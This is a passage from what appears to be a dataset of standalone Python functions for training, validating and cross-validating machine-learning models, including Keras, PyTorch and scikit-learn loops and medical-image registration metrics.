\"frames\"]-model_dict[\"frame_shift\"], frames_after=model_dict[\"frame_shift\"], view_IDs=model_dict[\"view_IDs\"], batch_size=model_dict[\"batch_size\"], mu=mu, sigma=sigma, label_name=model_dict[\"label_name\"], shuffle=True,\n valid_frames_before=valid_frames_before, valid_frames_after=valid_frames_after, valid_batch_size=valid_batch_size)\n train_gen, valid_gen = generators.get_train(), generators.get_valid()\n losses = Losses_Keras(\n frames=model_dict['frames'], frame_shift=model_dict['frame_shift'])\n loss_fnc = losses.get_by_name(model_dict[\"loss_function\"])\n ap_metrics = [AUC_AP(), Accuracy_AP(), Precision_AP(),\n Recall_AP(), PrecisionAtRecall_AP(0.95)]\n fp_hdf5 = os.path.join(model_dir, fold_name+\".hdf5\")\n fp_hdf5 = os.path.join(model_dir, fold_name+\".hdf5\")\n mcp = ModelCheckpoint(fp_hdf5, monitor='val_loss', verbose=True,\n save_best_only=True, save_weights_only=True)\n tbl = tensorflow.keras.callbacks.TensorBoard(os.path.join(model_dir, 'logs{}'.format(fold_name)))\n metrics = ap_metrics\n callbacks = [mcp, tbl]\n optimizer = tensorflow.keras.optimizers.Adam(learning_rate=model_dict['learning_rate'])\n epochs = model_dict[\"epochs\"]\n #### 1\n compile_kwargs = {\"loss\": loss_fnc,\n \"optimizer\": optimizer, \"metrics\": metrics}\n fit_kwargs = {\"x\": train_gen, \"epochs\": epochs,\n \"validation_data\": valid_gen, \"callbacks\": callbacks}\n Setup = SETUP_DIC[model_dict[\"architecture\"]]\n setup = Setup(name=model_dict[\"name\"], compile_kwargs=compile_kwargs, fit_kwargs=fit_kwargs,\n TPA_view_IDs=model_dict['view_IDs'])\n # setup.delete_existing_model_data_and_output()\n print(setup.model.summary())\n\n setup.train()\n setup.write_architecture()\n # setup.plot_metrics(plot_val_metrics=valid_gen)\n #### /1\n #### 2\n # Get optimal threshold.\n print(\"Getting optimal threshold...\")\n # RELOAD\n data_models_model_path = setup.data_models_model_path\n setup = Model_Evaluation(data_models_model_path, fold_name=fold_name,\n stateful=False, weights_ext=\"hdf5\", load_scaling=False)\n\n # https://support.sas.com/en/books/reference-books/analyzing-receiver-operating-characteristic-curves-with-sas/review.html\n # Gonen, Mithat. 2007. Analyzing Receiver Operating Characteristic Curves with SAS. Cary, NC: SAS Institute Inc.\n preds_list, trues_list = [], []\n # generators = [train_gen, valid_gen] if valid_gen else [train_gen]\n generators = [valid_gen] if valid_gen else [train_gen]\n for generator in generators:\n for i in range(len(generator)):\n x, y = generator[i]\n preds_list.append(setup.model.predict(x))\n trues_list.append(y)\n preds = np.vstack(preds_list)\n trues = np.vstack(trues_list)\n labels_dict, predictions_dict = {}, {}\n for idx, l in enumerate(zip(preds, trues)):\n pred, true = l\n predictions_dict[idx] = pred[:, 1]\n sample_class = true[-1][-1]\n labels_dict[idx] = model_dict[\"frames\"] - \\\n model_dict[\"frame_shift\"] if sample_class else -1\n if valid_gen:\n labels_dict[idx] = valid_frames_before if sample_class else -1\n prc_pre_fpr, prc_pre_tpr, prc_pre_thresholds = plots.prediction_pr_curve(\n labels_dict, predictions_dict)\n # get optimal threshold\n fpr, tpr, thresh = prc_pre_fpr[:-1], prc_pre_tpr[:-1], prc_pre_thresholds\n xy = np.stack([fpr, tpr]).T\n ideal = np.array([1, 1])\n d = ideal-xy\n D = (d*d).sum(axis=-1)\n optimal_threshold = thresh[D.argmin()]\n with open(os.path.join(data_models_model_path, project.THRESHOLD_FILE_PATTERN.format(fold_name)), \"wb\") as f:\n pickle.dump(optimal_threshold, f)\n #### /2\n print(\"Trained {}\".format(model_dict[\"name\"]))\n clear_session()\n return True", "def __train__(self):\n if (self.type_camf == 'CAMF_CI'):\n #users, items, context, ratings\n ci = camf_ci.CI_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = ci.fit()\n elif (self.type_camf == 'CAMF_CU'):\n cu = camf_cu.CU_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = cu.fit()\n elif (self.type_camf == 'CAMF_C'):\n c = camf_c.C_class(self.__users_array__, self.__items_array__, self.__context_array__, self.__ratings__, self.fold, self.lr, self.factors)\n predictions, losses = c.fit()\n\n dummy_pred = np.zeros((predictions.shape))\n for r, pred_array in enumerate(predictions):\n for c, pred in enumerate(pred_array):\n dummy_pred[r][c] = self.__check_ratings__(pred)\n predictions = dummy_pred\n #save a plot with a loss function\n plots = prs.PlotRSData()\n #print(losses)\n plots.plot_loss_cars(losses, self.type_camf, self.__save_prefix__+\"_loop\"+str(self.loop))\n pd.DataFrame(losses).to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ +\"losses_loop\"+str(self.loop)+\".csv\")\n print('Saving the feature matrix...')\n # set predictions back to the pivot table\n self.__utility_saved_training__(predictions) \n # save results\n self.utility_predictions.to_csv(\"./RecSys/out/CAMF/train/\"+self.type_camf+\"/\" + self.__save_prefix__ + \"_SGD_predictions_loop\"+str(self.loop)+\".csv\")", "def cross_validation(self, x, t):\n # Initialize accuracy / hyperparameters\n best_accuracy = 0.0\n best_reg = 0.0\n\n # Cross-validation 80-20\n N = x.shape[0]\n N_train = int(math.floor(0.8 * N))\n\n # Initialize the grid search hyperparameters\n min_reg = 0.001\n max_reg = 1000\n log_min_reg = np.log(min_reg)\n log_max_reg = np.log(max_reg)\n reg_list = np.logspace(log_min_reg, log_max_reg, num=7, base=math.e)\n\n for reg in reg_list:\n accuracy = np.zeros((self.k_fold))\n for i in range(self.k_fold):\n map_index = list(zip(x, t))\n random.shuffle(map_index)\n random_x, random_t = zip(*map_index)\n\n train_x = random_x[:N_train]\n valid_x = random_x[N_train:]\n train_t = random_t[:N_train]\n valid_t = random_t[N_train:]\n\n self.model = sklearn.neural_network.MLPClassifier(self.hidden_layer_sizes,\n activation=self.activation,\n alpha=reg, max_iter=1000, \n random_state=self.random_state)\n self.train(train_x, train_t)\n accuracy[i] = self.model.score(valid_x, valid_t)\n\n mean_accuracy = np.mean(accuracy)\n # print(mean_accuracy)\n if mean_accuracy > best_accuracy:\n best_accuracy = mean_accuracy\n best_reg = reg\n print(\"The new best hyperparameters are : \", best_reg)\n\n print(\"Best hyperparameters are : \", best_reg)\n print(\"Valid Accuracy :\", best_accuracy)\n self.reg = best_reg\n self.model = sklearn.neural_network.MLPClassifier(self.hidden_layer_sizes,\n activation=self.activation,\n alpha=best_reg, max_iter=1000, \n random_state=self.random_state)\n self.train(x, t)", "def cross_validate(pipeline, data, cv=4):\n print \"Running cross validation...\"\n (Xcv, ycv) = data\n kfold = KFold(n_splits=cv, shuffle=True, random_state=42)\n results = []\n for train_idx, val_idx in kfold.split(Xtrain):\n pipeline.fit(Xcv[train_idx], ycv[train_idx])\n results.append(accuracy_score(\n ycv[val_idx], pipeline.predict(Xcv[val_idx])\n ))\n print \"{} +/- {}\".format(np.mean(results), np.std(results))", "def validate(inputs):\n print \"running validation\"\n my_data = genfromtxt(inputs, delimiter='\\t',skip_header=0)\n n_col = my_data.shape[1]\n n_features=n_col-1 #assuming that the latest column\n #contains the the outputs \n #processing data without targets\n X = preprocessing.scale(np.hsplit(my_data,[n_features,n_col])[0])\n Y = np.squeeze(np.asarray(np.hsplit(my_data,[n_features,n_col])[1]))\n #for further information about parameters, please google sklearn docs\n parameters = {'kernel':('sigmoid', 'rbf'), 'C':[.1,.2,1.0],'cache_size':[500]}\n svr = svm.SVC()\n clf = grid_search.GridSearchCV(svr, parameters,n_jobs=3)\n sys.stdout.write(\"%s:validating... \"%(strftime(\"%Y-%m-%d %H:%M:%S\", gmtime())))\n output = clf.fit(X,Y)\n print output\n print \"(%s) DONE.\" % (strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()))\n sys.exit(0)", "def test(model, dataloader, params, args, val):\n\n # evaluation mode\n model.eval()\n\n # initialise buffers\n dice_lv_buffer = []\n dice_myo_buffer = []\n dice_rv_buffer = []\n\n mcd_lv_buffer = []\n hd_lv_buffer = []\n mcd_myo_buffer = []\n hd_myo_buffer = []\n mcd_rv_buffer = []\n hd_rv_buffer = []\n\n mean_mag_grad_detJ_buffer = []\n negative_detJ_buffer = []\n\n\n with tqdm(total=len(dataloader)) as t:\n # iterate over validation subjects\n for idx, (image_ed_batch, image_es_batch, label_ed_batch, label_es_batch) in enumerate(dataloader):\n # (data all in shape of (c, N, H, W))\n\n # extend to (N, c, H, W)\n image_ed_batch = image_ed_batch.permute(1, 0, 2, 3).to(device=args.device)\n image_es_batch = image_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n label_es_batch = label_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n\n with torch.no_grad():\n # compute optical flow and warped ED images towards ES\n dvf = model(image_ed_batch, image_es_batch)\n\n # transform label mask of ES frame\n warped_label_es_batch = resample_transform(label_es_batch.float(), dvf, interp='nearest')\n\n\n \"\"\" Move data to device \"\"\"\n if args.cuda:\n # move data to cpu to calculate metrics\n # (the axis permutation is to comply with metric calculation code which takes input shape H, W, N)\n warped_label_es_batch = warped_label_es_batch.squeeze(1).cpu().numpy().transpose(1, 2, 0)\n label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.cpu().numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n else:\n # CPU version of the code\n warped_label_es_batch = warped_label_es_batch.squeeze(1).numpy().transpose(1, 2, 0)\n label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n \"\"\"\"\"\"\n\n \"\"\" Calculate the metrics (only works with SAX images) \"\"\"\n # (optional) extract 3 slices (apical, mid-ventricle and basal)\n if not args.all_slices:\n num_slices = label_ed_batch.shape[-1]\n apical_idx = int(round((num_slices - 1) * 0.75)) # 75% from basal\n mid_ven_idx = int(round((num_slices - 1) * 0.5)) # 50% from basal\n basal_idx = int(round((num_slices - 1) * 0.25)) # 25% from basal\n slices_idx = [apical_idx, mid_ven_idx, basal_idx]\n\n warped_label_es_batch = warped_label_es_batch[:, :, slices_idx]\n label_ed_batch = label_ed_batch[:, :, slices_idx]\n dvf = dvf[slices_idx, :, :, :] # needed for detJac\n\n # dice\n dice_lv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=1)\n dice_myo = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=2)\n dice_rv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=3)\n\n dice_lv_buffer += [dice_lv]\n dice_myo_buffer += [dice_myo]\n dice_rv_buffer += [dice_rv]\n\n # contour distances\n mcd_lv, hd_lv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=1, dx=params.pixel_size)\n mcd_myo, hd_myo = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=2, dx=params.pixel_size)\n mcd_rv, hd_rv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=3, dx=params.pixel_size)\n\n # determinant of Jacobian\n mean_grad_detJ, mean_negative_detJ = detJac_stack(dvf)\n\n\n # update buffers\n mcd_lv_buffer += [mcd_lv]\n hd_lv_buffer += [hd_lv]\n mcd_myo_buffer += [mcd_myo]\n hd_myo_buffer += [hd_myo]\n mcd_rv_buffer += [mcd_rv]\n hd_rv_buffer += [hd_rv]\n\n mean_mag_grad_detJ_buffer += [mean_grad_detJ]\n negative_detJ_buffer += [mean_negative_detJ]\n\n t.update()\n\n # construct metrics dict\n metrics = {'dice_lv_mean': np.mean(dice_lv_buffer), 'dice_lv_std': np.std(dice_lv_buffer),\n 'dice_myo_mean': np.mean(dice_myo_buffer), 'dice_myo_std': np.std(dice_myo_buffer),\n 'dice_rv_mean': np.mean(dice_rv_buffer), 'dice_rv_std': np.std(dice_rv_buffer),\n\n 'mcd_lv_mean': np.mean(mcd_lv_buffer), 'mcd_lv_std': np.std(mcd_lv_buffer),\n 'mcd_myo_mean': np.mean(mcd_myo_buffer), 'mcd_myo_std': np.std(mcd_myo_buffer),\n 'mcd_rv_mean': np.mean(mcd_rv_buffer), 'mcd_rv_std': np.std(mcd_rv_buffer),\n\n 'hd_lv_mean': np.mean(hd_lv_buffer), 'hd_lv_std': np.std(hd_lv_buffer),\n 'hd_myo_mean': np.mean(hd_myo_buffer), 'hd_myo_std': np.std(hd_myo_buffer),\n 'hd_rv_mean': np.mean(hd_rv_buffer), 'hd_rv_std': np.std(hd_rv_buffer),\n\n 'mean_mag_grad_detJ_mean': np.mean(mean_mag_grad_detJ_buffer),\n 'mean_mag_grad_detJ_std': np.std(mean_mag_grad_detJ_buffer),\n\n 'negative_detJ_mean': np.mean(negative_detJ_buffer),\n 'negative_detJ_std': np.std(negative_detJ_buffer)\n }\n\n\n if not val:\n # testing only: save all metrics evaluated for all test subjects in pandas dataframe\n test_result_dir = os.path.join(args.model_dir, \"test_results\")\n if not os.path.exists(test_result_dir):\n os.makedirs(test_result_dir)\n\n # save metrics results mean & std\n xutils.save_dict_to_json(metrics,\n f\"{test_result_dir}/test_results_3slices_{not args.all_slices}.json\")\n\n # save accuracy metrics of every subject\n subj_id_buffer = dataloader.dataset.dir_list\n df_buffer = []\n column_method = ['DL'] * len(subj_id_buffer)\n for struct in ['LV', 'MYO', 'RV']:\n if struct == 'LV':\n ls_dice = dice_lv_buffer\n ls_mcd = mcd_lv_buffer\n ls_hd = hd_lv_buffer\n elif struct == 'MYO':\n ls_dice = dice_myo_buffer\n ls_mcd = mcd_myo_buffer\n ls_hd = hd_myo_buffer\n elif struct == 'RV':\n ls_dice = dice_rv_buffer\n ls_mcd = mcd_rv_buffer\n ls_hd = hd_rv_buffer\n\n ls_struct = [struct] * len(subj_id_buffer)\n data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'Structure': ls_struct,\n 'Dice': ls_dice,\n 'MCD': ls_mcd,\n 'HD': ls_hd}\n df_buffer += [pd.DataFrame(data=data)]\n # concatenate df and save\n metrics_df = pd.concat(df_buffer, axis=0)\n metrics_df.to_pickle(f\"{test_result_dir}/test_accuracy_results_3slices_{not args.all_slices}.pkl\")\n\n # save detJac metrics for every subject\n jac_data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'GradDetJac': mean_mag_grad_detJ_buffer,\n 'NegDetJac': negative_detJ_buffer}\n jac_df = pd.DataFrame(data=jac_data)\n jac_df.to_pickle(f\"{test_result_dir}/test_Jacobian_results_3slices{not args.all_slices}.pkl\")\n\n return metrics", "def cross_valid_key(model,x,key,preds,target,metric,verbose=True): \r\n\r\n score=[]\r\n \r\n keys = x[key].unique().tolist()\r\n \r\n\r\n\r\n for idx, item in enumerate([1,2,3,4,5]):\r\n\r\n xtrain,xtest = split_camp(x,keys,0.2)\r\n \r\n model.fit(xtrain[feat],xtrain[target])\r\n\r\n ypred = model.predict(xtest[feat])\r\n \r\n ytrue= xtest[target].values \r\n \r\n if metric == 'mae':\r\n score.append(mae(ytrue,ypred))\r\n elif metric == 'mse':\r\n score.append(mse(ytrue,ypred))\r\n elif metric == 'rrmse':\r\n score.append(rrmse(ytrue,ypred))\r\n\r\n else:\r\n score.append(rmse(xtest[target].tolist(),ypred))\r\n\r\n if verbose:\r\n print('-'*30)\r\n print(f'\\nFold {idx} out of 5')\r\n print(f'Key {item}')\r\n print(f'{metric}: {score[idx]}')\r\n\r\n \r\n\r\n if verbose:\r\n print(f'\\n Overall Score:')\r\n print(f'{metric}: Mean: {np.mean(score)} Std: {np.std(score)}')\r\n\r\n\r\n return score", "def run_validation(self):\n # Build a list of validation .hdf5 file paths:\n files = []\n for fname in os.listdir(self.hdf5_directory):\n fpath = os.path.join(self.hdf5_directory, fname)\n if os.path.isfile(fpath) and fname.startswith('validation.') and fname.endswith('.hdf5'):\n files.append(fpath)\n f_start_id = 0\n files.sort()\n num_files = len(files)\n\n # Select first .hdf5 file\n if \\\n torch.distributed.is_initialized() \\\n and torch.distributed.get_world_size() > num_files:\n\n remainder = torch.distributed.get_world_size() % num_files\n hdf5_fpath = files[\n (\n f_start_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n + remainder * f_start_id\n ) % num_files\n ]\n else:\n hdf5_fpath = files[\n (\n f_start_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n ) % num_files\n ]\n\n # Set previous_file variable for next iteration\n previous_file = hdf5_fpath\n\n # Load the pre-training data from the .hdf5 file\n pretraining_data = PretrainingDataset(\n hdf5_fpath=hdf5_fpath,\n max_masked_tokens_per_input=self.max_masked_tokens_per_input\n )\n validation_sampler = RandomSampler(pretraining_data) # This could be SequentialSampler\n validation_dataloader = DataLoader(\n pretraining_data,\n sampler=validation_sampler,\n batch_size=self.batch_size * self.n_gpu,\n num_workers=4, pin_memory=True\n )\n\n steps = 0\n average_loss = 0.0 # averaged loss every self.log_freq steps\n\n # Use model in `evaluation mode`\n with torch.no_grad():\n self.model.eval()\n if self.is_main_process:\n logging.info(\"*************************\")\n logging.info(\"** Evaluation step **\")\n logging.info(\"*************************\")\n\n # Loop over the rest of pre-training data files\n pool = ProcessPoolExecutor(1)\n if len(files) == 1:\n f_start_id = -1\n for f_id in range(f_start_id + 1, 1 + len(files)//torch.distributed.get_world_size()):\n\n # Submit creation of next DataLoader\n if torch.distributed.get_world_size() > num_files:\n hdf5_fpath = files[\n (\n f_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n + remainder * f_id\n ) % num_files\n ]\n else:\n hdf5_fpath = files[\n (\n f_id * torch.distributed.get_world_size()\n + torch.distributed.get_rank()\n ) % num_files\n ]\n if self.is_main_process:\n logging.info(\n \"Local rank: %s | File n° %s: %s\",\n self.local_rank, f_id, os.path.basename(previous_file)\n )\n previous_file = hdf5_fpath\n dataset_future = pool.submit(\n create_pretraining_dataloader,\n hdf5_fpath,\n self.max_masked_tokens_per_input,\n self.batch_size * self.n_gpu,\n )\n\n # Iterate over batches (w/ progress bar for main process)\n validation_batches = tqdm(\n validation_dataloader,\n desc=\"Computing loss on the validation set...\"\n ) if self.is_main_process else validation_dataloader\n for batch in validation_batches:\n steps += 1\n (\n input_ids,\n segment_ids,\n input_mask,\n masked_lm_labels,\n next_sentence_labels\n ) = [tensor.to(self.device) for tensor in batch]\n\n # Forward Pass\n model_output = self.model(\n input_ids=input_ids,\n token_type_ids=segment_ids,\n attention_mask=input_mask,\n labels=masked_lm_labels,\n next_sentence_label=next_sentence_labels)\n loss = model_output['loss']\n if self.n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu.\n\n divisor = self.num_accumulation_steps\n if self.num_accumulation_steps > 1:\n if not self.allreduce_post_accumulation:\n # this division was merged into predivision\n loss = loss / self.num_accumulation_steps\n divisor = 1.0\n\n # Update average\n average_loss += loss.item()\n \n # Move to next file after using up all batches of current file\n del validation_dataloader\n validation_dataloader, hdf5_fpath = \\\n dataset_future.result(timeout=None)\n\n del validation_dataloader\n\n num_steps = max(1, int(steps / self.num_accumulation_steps))\n average_loss = torch.tensor(average_loss, dtype=torch.float32).cuda()\n average_loss = average_loss / (num_steps * divisor)\n if torch.distributed.is_initialized():\n average_loss /= torch.distributed.get_world_size()\n torch.distributed.all_reduce(average_loss)\n\n # Check if model has improved\n validation_loss = average_loss.item()\n model_has_improved = False\n if validation_loss < self.best_validation_loss:\n model_has_improved = True\n self.best_validation_loss = validation_loss\n\n # Log\n if self.is_main_process:\n logging.info(\n \"\\nTotal Validation Steps: %s | Validation Loss = %.3f\",\n num_steps, validation_loss\n )\n self.tensorboard_writer.add_scalar(\n \"Avg. validation loss\", validation_loss,\n global_step=self.global_step\n )\n\n # NOTE: /!\\ Put model back in `training mode`\n self.model.train()\n\n return model_has_improved", "def validate(val_loader, model, criterion, epoch, opt):\n # switch to evaluate mode\n model.eval()\n\n top1 = utils.AverageMeter()\n\n for i, (input_points, _labels, segs) in enumerate(val_loader):\n # bz x 2048 x 3 \n input_points = Variable(input_points, volatile=True)\n input_points = input_points.transpose(2, 1)\n _labels = _labels.long() # this will be feed to the network \n segs = segs.long()\n labels_onehot = utils.labels_batch2one_hot_batch(_labels, opt.num_classes)\n segs = Variable(segs, volatile=True) \n labels_onehot = Variable(labels_onehot, volatile=True)\n\n if opt.cuda:\n input_points = input_points.cuda() \n segs = segs.cuda() # must be long cuda tensor \n labels_onehot = labels_onehot.float().cuda() # this will be feed into the network\n \n # forward, backward optimize \n pred, _, _ = model(input_points, labels_onehot)\n pred = pred.view(-1, opt.num_seg_classes)\n segs = segs.view(-1, 1)[:, 0] # min is already 0\n # debug_here() \n loss = criterion(pred, segs) \n\n pred_choice = pred.data.max(1)[1]\n correct = pred_choice.eq(segs.data).cpu().sum()\n\n acc = correct/float(opt.batch_size * opt.num_points)\n top1.update(acc, input_points.size(0))\n\n if i % opt.print_freq == 0:\n print('[%d: %d] val loss: %f accuracy: %f' %(i, len(val_loader), loss.data[0], acc))\n # print(tested_samples)\n return top1.avg", "def run_cross_validation_create_models(nfolds=10):\n print(\"nfold value=\",nfolds)\n x_train, y_train, x_train_id = load_images_train()\n print(len(x_train))\n\n # input image dimensions\n batch_size = 16\n nb_epoch = 32\n random_state = 159\n\n seed = 7\n np.random.seed(seed)\n kfold = StratifiedKFold(n_splits=nfolds, shuffle=True, random_state=random_state)\n #kfold = StratifiedShuffleSplit(n_splits=nfolds,test_size=0.1,train_size=0.7,random_state=random_state)\n cvscores = []\n models = []\n\n image_array = np.asarray(x_train, dtype=np.float32)\n # print(image_array.shape)\n\n datagen_test = ImageDataGenerator(\n featurewise_center=True,\n featurewise_std_normalization=True,\n preprocessing_function=pre_processing_image\n )\n\n datagen = ImageDataGenerator(\n rotation_range=20,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n preprocessing_function=pre_processing_image,\n vertical_flip=True,\n horizontal_flip=True,\n fill_mode='nearest'\n )\n\n start_time = time.time()\n print(\"Datagen.fit started\")\n datagen.fit(image_array, augment=True, rounds=3)\n print('Fit Completed: {} seconds'.format(round(time.time() - start_time, 2)))\n\n img_label = np_utils.to_categorical(y_train, 8)\n\n yfull_train = dict()\n num_fold = 0\n sum_score = 0\n\n for train_index, test_index in kfold.split(x_train, y_train):\n # create model\n model = create_model()\n train_x = image_array[train_index]\n train_y = img_label[train_index]\n validate_x = image_array[test_index]\n validate_y = img_label[test_index]\n\n num_fold += 1\n print('Start KFold number {} from {}'.format(num_fold, nfolds))\n print('Split train: ', len(train_x), len(train_y))\n print('Split valid: ', len(validate_x), len(validate_y))\n\n callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=4, verbose=1, mode='auto')]\n\n model.fit_generator(generator=datagen.flow(train_x, train_y, batch_size=batch_size, shuffle=True),\n steps_per_epoch=len(image_array)/32, epochs=nb_epoch, verbose=1,\n callbacks=callbacks,validation_data=(validate_x,validate_y),\n validation_steps=len(image_array)/32)\n\n predictions_valid = model.predict(validate_x.astype('float32'), batch_size=batch_size, verbose=1)\n\n\n score = log_loss(validate_y, predictions_valid)\n print('Score log_loss: ', score)\n\n\n sum_score += score * len(test_index)\n\n # Store valid predictions\n for i in range(len(test_index)):\n yfull_train[test_index[i]] = predictions_valid[i]\n\n models.append(model)\n\n score = sum_score / len(x_train)\n print(\"Log_loss train independent avg: \", score)\n\n info_string = 'loss_' + str(score) + '_folds_' + str(10) + '_ep_' + str(28)\n return info_string,models", "def validate(model,dataloader,criterions,epoch,plots):\n # switch to evaluate mode\n model.eval()\n\n running_loss = 0.0\n running_oa = 0.0\n running_moa = 0.0\n\n avg_losses={}\n avg_accuracies={}\n avg_moas={}\n for i in range(6):\n avg_losses[i] = AverageMeter()\n avg_accuracies[i] = AverageMeter()\n avg_moas[i] = AverageMeter()\n\n tq_bar = tqdm(enumerate(dataloader),total=len(dataloader),ncols=80,desc='Testing')\n for batch_id, (images, labels_group) in tq_bar:\n # if i>25:\n # break\n if torch.cuda.is_available():\n images = [Variable(image.cuda()) for image in images]\n labels_group = [labels for labels in labels_group]\n else:\n print('Cuda not available')\n images = [Variable(image) for image in images]\n labels_group = [labels for labels in labels_group]\n\n\n batch_losses = []\n batch_accuracies = []\n batch_moas = []\n\n for img, labels in zip(images, labels_group):\n outputs = model(img)\n net_batch_size = outputs[0].size(0)\n if torch.cuda.is_available():\n labels = [Variable(label.cuda()) for label in labels]\n else:\n labels = [Variable(label) for label in labels]\n for i,pair in enumerate(zip(outputs, labels)):\n accuracy = accuracy_dense(pair[0].data, pair[1].data)\n moa,_ = mAP_dense(pair[0].data, pair[1].data)\n batch_losses.append(criterions[i](pair[0], pair[1]))\n batch_accuracies.append(accuracy)\n batch_moas.append(moa)\n\n for i in range(6):\n avg_losses[i].update(batch_losses[i].data[0], net_batch_size)\n avg_accuracies[i].update(batch_accuracies[i], net_batch_size)\n avg_moas[i].update(batch_moas[i], net_batch_size)\n\n ## LOSS COMPUTATION\n # loss_weight = [auto_loss_weight(0,epoch), auto_loss_weight(1,epoch), auto_loss_weight(2,epoch), auto_loss_weight(3,epoch), auto_loss_weight(4,epoch)]\n if epoch < 40:\n loss_weight = [0.1, 0.1, 0.1, 0.1, 0.1, 0.5]\n else:\n loss_weight = [0.5, 0.1, 0.1, 0.1, 0.1, 0.1]\n\n # loss_weight = [1., 0.01, 0.01, 0.01, 0.01, 0.01] # fait converger en OA la HD layer\n loss_weight = [1.,0.7, 0.6, 0.5, 0.1, 0.05, 0.01]\n\n total_batch_loss = 0\n for w, l in zip(loss_weight, batch_losses):\n total_batch_loss += w*l\n\n\n running_loss += total_batch_loss.data[0]\n # running_oa += oa\n # running_hd_moa += hd_moa\n for i in range(6):\n plots.plot(\"Total loss (running)\", \"val \"+str(i), epoch*len(dataloader)+batch_id+1, avg_losses[i].val)\n plots.plot(\"OA (running)\", \"val \"+str(i), epoch*len(dataloader)+batch_id+1, avg_accuracies[i].val)\n plots.plot(\"mOA (running)\", \"val \"+str(i), epoch*len(dataloader)+batch_id+1, avg_moas[i].val)\n for i in range(6):\n plots.plot(\"Total loss (final mean of epoch)\", \"val \"+str(i), epoch+1, avg_losses[i].val)\n plots.plot(\"OA (final mean of epoch)\", \"val \"+str(i), epoch+1, avg_accuracies[i].val)\n plots.plot(\"mOA (final mean of epoch)\", \"val \"+str(i), epoch+1, avg_moas[i].val)", "def crossTrain(data, labels, outDir, modelsPer, validator, params):\n\tcompleted = 0\n\tresults = []\n\n\tout = open(join(outDir, \"log.txt\"), \"a\")\n\n\t#for each fold split the data and train models keeping the best\n\tfor i, partition in enumerate(validator.partition(data,params.eventMap.matrixToIndex(labels))):\n\n\t\tif params.limit and completed == params.limit:\n\t\t\treturn results\n\n\t\tprint(\"Fold {}\".format(i))\n\n\t\t#create the output directory\n\t\tfoldDir = join(outDir, \"fold{}\".format(i))\n\n\t\tif not os.access(foldDir, os.F_OK):\n\t\t\tmkdir(foldDir)\n\n\t\t\tprint(\"Training Size {}, Dev Size {}\".format(len(partition[0]), len(partition[1])))\n\n\t\t\t#train models\n\t\t\tbestScore, rnd, epoch, best = trainOnFold(data, labels, foldDir, modelsPer, partition, params)\n\n\t\t\tprint(\"Best Score {}\".format(bestScore))\n\n\t\t\tout.write(\"Round {}, Epoch {}, Score {}\\n\".format(rnd, epoch, bestScore))\n\t\t\tout.flush()\n\t\t\tos.fsync(out)\n\n\t\t\tresults.append(best)\n\t\t\tcompleted += 1\n\t\telse:\n\t\t\tprint(\"Fold {} already exists\".format(i))\n\n\tout.close()\n\n\treturn results", "def fit_model(args, model, files, batchsize, var_targets, epoch, shuffle, n_events=None, tb_logger=False):\n\n train_steps_per_epoch = int(getNumEvents(files['train']) / batchsize)\n # validation_steps = int(min([getNumEvents(files['val']), 5000]) / batchsize)\n validation_steps = int(getNumEvents(files['val']) / batchsize)\n genVal = generate_batches_from_files(files['val'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0)\n\n callbacks = []\n csvlogger = ks.callbacks.CSVLogger(args.folderOUT + 'history.csv', separator='\\t', append=args.resume)\n modellogger = ks.callbacks.ModelCheckpoint(args.folderOUT + 'models/weights-{epoch:03d}.hdf5', save_weights_only=True, period=1)\n lrscheduler = ks.callbacks.LearningRateScheduler(LRschedule_stepdecay, verbose=1)\n epochlogger = EpochLevelPerformanceLogger(args=args, files=files['val'], var_targets=var_targets)\n batchlogger = BatchLevelPerformanceLogger(display=5, skipBatchesVal=40, steps_per_epoch=train_steps_per_epoch, args=args, #15, 20\n genVal=generate_batches_from_files(files['val'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0)) #batchsize//2\n callbacks.append(csvlogger)\n callbacks.append(modellogger)\n callbacks.append(lrscheduler)\n callbacks.append(batchlogger)\n # callbacks.append(epochlogger)\n if tb_logger is True:\n print 'TensorBoard Log Directory:'\n print args.folderRUNS + 'tb_logs/%s'%(args.folderOUT[args.folderOUT.rindex('/', 0, len(args.folderOUT) - 1) + 1 : -1])\n tensorlogger = TensorBoardWrapper(generate_batches_from_files(files['val'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0),\n nb_steps=validation_steps, log_dir=(args.folderRUNS + 'tb_logs/%s'%(args.folderOUT[args.folderOUT.rindex('/', 0, len(args.folderOUT) - 1) + 1 : -1])),\n histogram_freq=1, batch_size=batchsize, write_graph=True, write_grads=True, write_images=True)\n callbacks.append(tensorlogger)\n\n epoch = (int(epoch[0]), int(epoch[1]))\n print 'training from:', epoch\n\n print 'training steps:', train_steps_per_epoch\n print 'validation steps:', validation_steps\n\n model.fit_generator(\n generate_batches_from_files(files['train'], batchsize=batchsize, wires=args.wires, class_type=var_targets, yield_mc_info=0),\n steps_per_epoch=train_steps_per_epoch,\n 